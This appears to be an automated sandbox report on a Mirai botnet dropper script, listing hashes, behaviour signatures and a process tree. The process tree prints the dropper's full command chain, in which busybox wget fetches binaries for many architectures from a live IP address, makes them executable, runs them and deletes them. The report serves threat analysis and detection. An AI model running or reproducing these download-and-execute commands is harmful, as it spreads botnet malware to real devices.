Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags
    arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    10/03/2025, 22:22

General

  • Target

    wget.sh

  • Size

    1KB

  • MD5

    fe3891afe068ca6fc86017361dfb753c

  • SHA1

    d631b6a4eaa99085df4260727c2c86dc82cf5428

  • SHA256

    8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

  • SHA512

    810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Malware Config

Extracted
  • Family
    mirai
  • Botnet
    BOTNET

Extracted
  • Family
    mirai
  • Botnet
    BOTNET

Extracted
  • Family
    mirai
  • Botnet
    BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware family that infects exposed network devices.

  • Mirai family
  • Contacts a large (105128) number of remote hosts (1 TTPs)

    This may indicate a network scan to discover remotely running services.

  • Creates a large number of network flows (1 TTPs)

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification (1 TTPs, 12 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (8 IoCs)
  • Modifies Watchdog functionality (1 TTPs, 2 IoCs)

    Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.

  • Renames itself (1 IoCs)
  • Unexpected DNS network traffic destination (20 IoCs)

    Network traffic on the DNS port to servers other than the configured DNS servers was detected.

  • Enumerates active TCP sockets (1 TTPs, 1 IoCs)

    Gets active TCP sockets from the /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads process memory (1 TTPs, 35 IoCs)

    Reads the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name (1 IoCs)
  • Reads system network configuration (1 TTPs, 1 IoCs)

    Uses the contents of the /proc filesystem to enumerate network settings.

  • Reads runtime system information (64 IoCs)

    Reads data from the /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTPs, 3 IoCs)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (8 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Executes dropped EXE
    PID:721
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
      2⤵
      • Writes file to tmp directory
      PID:723
    • /bin/busybox
      /bin/busybox chmod +x jklarm
      2⤵
      • File and Directory Permissions Modification
      PID:749
    • /tmp/jklarm
      ./jklarm telnet
      2⤵
      PID:750
    • /bin/busybox
      /bin/busybox rm -rf jklarm
      2⤵
      PID:752
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
      2⤵
      • Writes file to tmp directory
      PID:753
    • /bin/busybox
      /bin/busybox chmod +x jklarm5
      2⤵
      • File and Directory Permissions Modification
      PID:754
    • /tmp/jklarm5
      ./jklarm5 telnet
      2⤵
      PID:755
    • /bin/busybox
      /bin/busybox rm -rf jklarm5
      2⤵
      PID:757
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
      2⤵
      • Writes file to tmp directory
      PID:758
    • /bin/busybox
      /bin/busybox chmod +x jklarm6
      2⤵
      • File and Directory Permissions Modification
      PID:759
    • /tmp/jklarm6
      ./jklarm6 telnet
      2⤵
      PID:760
    • /bin/busybox
      /bin/busybox rm -rf jklarm6
      2⤵
      PID:762
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
      2⤵
      • Writes file to tmp directory
      PID:763
    • /bin/busybox
      /bin/busybox chmod +x jklarm7
      2⤵
      • File and Directory Permissions Modification
      PID:765
    • /tmp/jklarm7
      ./jklarm7 telnet
      2⤵
      PID:767
    • /bin/busybox
      /bin/busybox rm -rf jklarm7
      2⤵
      PID:769
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
      2⤵
      • Writes file to tmp directory
      PID:770
    • /bin/busybox
      /bin/busybox chmod +x jklm68k
      2⤵
      • File and Directory Permissions Modification
      PID:778
    • /tmp/jklm68k
      ./jklm68k telnet
      2⤵
      PID:779
    • /bin/busybox
      /bin/busybox rm -rf jklm68k
      2⤵
      PID:782
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:783
    • /bin/busybox
      /bin/busybox chmod +x jklmips
      2⤵
      • File and Directory Permissions Modification
      PID:794
    • /tmp/jklmips
      ./jklmips telnet
      2⤵
      • System Network Configuration Discovery
      PID:795
    • /bin/busybox
      /bin/busybox rm -rf jklmips
      2⤵
      • System Network Configuration Discovery
      PID:797
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
      2⤵
      • Writes file to tmp directory
      PID:799
    • /bin/busybox
      /bin/busybox chmod +x jklmpsl
      2⤵
      • File and Directory Permissions Modification
      PID:809
    • /tmp/jklmpsl
      ./jklmpsl telnet
      2⤵
      • Modifies Watchdog functionality
      • Renames itself
      • Enumerates active TCP sockets
      • Reads process memory
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:811
    • /bin/busybox
      /bin/busybox rm -rf jklmpsl
      2⤵
      PID:814
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
      2⤵
      • Writes file to tmp directory
      PID:816
    • /bin/busybox
      /bin/busybox chmod +x jklppc
      2⤵
      • File and Directory Permissions Modification
      PID:865
    • /tmp/jklppc
      ./jklppc telnet
      2⤵
      PID:866
    • /bin/busybox
      /bin/busybox rm -rf jklppc
      2⤵
      PID:868
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
      2⤵
      PID:869
    • /bin/busybox
      /bin/busybox chmod +x jklsh4
      2⤵
      • File and Directory Permissions Modification
      PID:870
    • /tmp/jklsh4
      ./jklsh4 telnet
      2⤵
      PID:871
    • /bin/busybox
      /bin/busybox rm -rf jklsh4
      2⤵
      PID:872
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
      2⤵
      PID:873
    • /bin/busybox
      /bin/busybox chmod +x jklspc
      2⤵
      • File and Directory Permissions Modification
      PID:874
    • /tmp/jklspc
      ./jklspc telnet
      2⤵
      PID:875
    • /bin/busybox
      /bin/busybox rm -rf jklspc
      2⤵
      PID:876
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
      2⤵
      PID:877
    • /bin/busybox
      /bin/busybox chmod +x jklx86
      2⤵
      • File and Directory Permissions Modification
      PID:878
    • /tmp/jklx86
      ./jklx86 telnet
      2⤵
      PID:879
    • /bin/busybox
      /bin/busybox rm -rf jklx86
      2⤵
      PID:880
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
      2⤵
      PID:881
    • /bin/busybox
      /bin/busybox chmod +x jklarc
      2⤵
      • File and Directory Permissions Modification
      PID:882
    • /tmp/jklarc
      ./jklarc telnet
      2⤵
      PID:883
    • /bin/busybox
      /bin/busybox rm -rf jklarc
      2⤵
      PID:884
    • /bin/busybox
      /bin/busybox rm -rf wget.sh
      2⤵
      PID:885

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/jklarm
    Filesize
    60KB
    MD5
    35c215d8e2b2ea03a8a191fb3723195a
    SHA1
    c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
    SHA256
    c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
    SHA512
    ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

  • /tmp/jklarm5
    Filesize
    60KB
    MD5
    a04040c769cad786555e183ba8ae0ca0
    SHA1
    a89d6b50a8140dddce29595c64949214e65c84f1
    SHA256
    7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
    SHA512
    e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

  • /tmp/jklarm6
    Filesize
    69KB
    MD5
    9e18604aa4c5bedd6e9ea6690b751880
    SHA1
    c1f32fe93aa650f9920fc5bd659d23621ab034a2
    SHA256
    41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
    SHA512
    cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

  • /tmp/jklarm7
    Filesize
    82KB
    MD5
    a9675614a267473cb83e195d9074a067
    SHA1
    a4d148cf841fc2b84c8bb3dd322e40f601532875
    SHA256
    fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
    SHA512
    8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

  • /tmp/jklm68k
    Filesize
    60KB
    MD5
    f5fa9a5e6c2a71c86b783b6b5586c3e4
    SHA1
    1a7888806663b58f4bee84472dab0b63adfab8ea
    SHA256
    d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d
    SHA512
    e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a

  • /tmp/jklmips
    Filesize
    78KB
    MD5
    ce4bd94ea8cbc021bf79e11f1f734c25
    SHA1
    f562c88119484f3e92be6e95cb0a435836ca6362
    SHA256
    ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab
    SHA512
    d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29

  • /tmp/jklmpsl
    Filesize
    79KB
    MD5
    9f79f159a672411a7e5b01f1ed3deb4a
    SHA1
    98584c58a231322ed3e64b96727fe6d935f30aa4
    SHA256
    9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa
    SHA512
    8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537

  • /tmp/jklppc
    Filesize
    59KB
    MD5
    2d898ada13cb85e3fc710949c44ade47
    SHA1
    db36b96c9531eff756b3d2ee92b632bc4903a179
    SHA256
    00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd
    SHA512
    e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78